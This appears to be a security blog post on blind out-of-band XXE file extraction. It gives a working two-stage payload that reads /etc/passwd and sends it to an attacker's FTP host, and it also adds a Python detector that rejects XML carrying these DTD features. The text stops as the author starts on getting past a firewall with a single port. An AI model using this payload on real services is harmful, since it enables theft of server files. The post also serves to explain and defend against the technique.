Suppose we have discovered an XXE vulnerability and are trying to do blind out-of-band (OOB) extraction of local file contents.
There are several different ways to do this. I recently had to use FTP extraction (AFAIK, this was due to the Java version of the vulnerable service – it did not allow HTTP extraction of some files, e.g.
I used the following vector:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://host:1111/ext.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
and placed at http://host:1111/ext.dtd the following DTD:
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://host:2222/%data;'>">
This works the following way:
1. While processing the XML source, the vulnerable app loads the external DTD via HTTP from http://host:1111/ext.dtd.
2. While processing the loaded DTD, the app reads the local file /etc/passwd and tries to load the external entity exfil via FTP from ftp://host:2222/%data;, where %data; is replaced by the XML parser with the content of /etc/passwd. Thus, if we control the FTP server, we can easily read the extracted data.
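From the defender's side, the two stages above leave a very recognisable footprint in the raw input: a DOCTYPE, an external parameter entity pointing at an http: resource, a %name; reference, and (in the second-stage DTD) a file: source feeding an ftp: sink. The following Python is an added example, not code from the original post, that pre-screens untrusted XML bytes for exactly these DTD features and refuses to parse anything that carries them; the sample documents are constructed from the vector shown above, and the function names (inspect_xml, parse_untrusted, is_rejected) are my own.

```python
import re
from xml.etree import ElementTree as ET

# Patterns over the raw bytes, applied before any parser touches the input.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY [%] name SYSTEM|PUBLIC "literal" ; for PUBLIC the first literal is the
# public id, which is still enough to classify the declaration as external.
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(%\s*)?([A-Za-z_:][\w.:-]*)\s+(SYSTEM|PUBLIC)\s+(['\"])(.*?)\4",
    re.IGNORECASE | re.DOTALL,
)
# %name; is a parameter entity reference, the mechanism the blind vector relies on.
PARAM_ENTITY_REF_RE = re.compile(rb"%[A-Za-z_:][\w.:-]*;")


def inspect_xml(data: bytes) -> list:
    """Return string findings describing DTD machinery present in the input."""
    findings = []
    if DOCTYPE_RE.search(data):
        findings.append("doctype-present")
    for m in EXTERNAL_ENTITY_RE.finditer(data):
        kind = "parameter-entity" if m.group(1) else "general-entity"
        name = m.group(2).decode("ascii", "replace")
        uri = m.group(5).decode("utf-8", "replace")
        scheme = uri.split(":", 1)[0].lower() if ":" in uri else "relative"
        findings.append(f"external-{kind}:{name}:{scheme}")
    if PARAM_ENTITY_REF_RE.search(data):
        findings.append("parameter-entity-reference")
    return findings


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse only when the input carries no DTD at all; otherwise reject loudly."""
    findings = inspect_xml(data)
    if findings:
        raise ValueError("rejected XML input: " + ", ".join(findings))
    return ET.fromstring(data)


def is_rejected(data: bytes) -> bool:
    """Convenience wrapper: True if parse_untrusted refuses the document."""
    try:
        parse_untrusted(data)
    except ValueError:
        return True
    return False


# Constructed samples: the first-stage vector and second-stage DTD from the post,
# plus a harmless document that should pass.
ATTACK_XML = b"""<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://host:1111/ext.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>"""

EXT_DTD = b"""<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://host:2222/%data;'>">"""

BENIGN_XML = b'<?xml version="1.0" ?><r><item id="1">ok</item></r>'

if __name__ == "__main__":
    print(inspect_xml(ATTACK_XML))
    print(inspect_xml(EXT_DTD))
    print(parse_untrusted(BENIGN_XML).tag)
```

Run against EXT_DTD the screen reports both the file: parameter entity and the nested ftp: general entity, which is the file-to-FTP chain the post describes; run against the first-stage document it reports the http: parameter entity and the %sp; reference. Treat this as a detection signal and a defence-in-depth filter at the boundary (it is a byte-level heuristic, so encoding tricks can evade it); the primary control is still the parser configuration, e.g. for a Java DocumentBuilderFactory setting the http://apache.org/xml/features/disallow-doctype-decl feature to true, which removes the DOCTYPE this whole technique depends on.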
And everything would have been fine, but the vulnerable server's firewall allowed outgoing connections only on port 3785, and we needed to make two requests: one over HTTP and then one over FTP. So I had to think about how to serve both protocols on one single port 🙂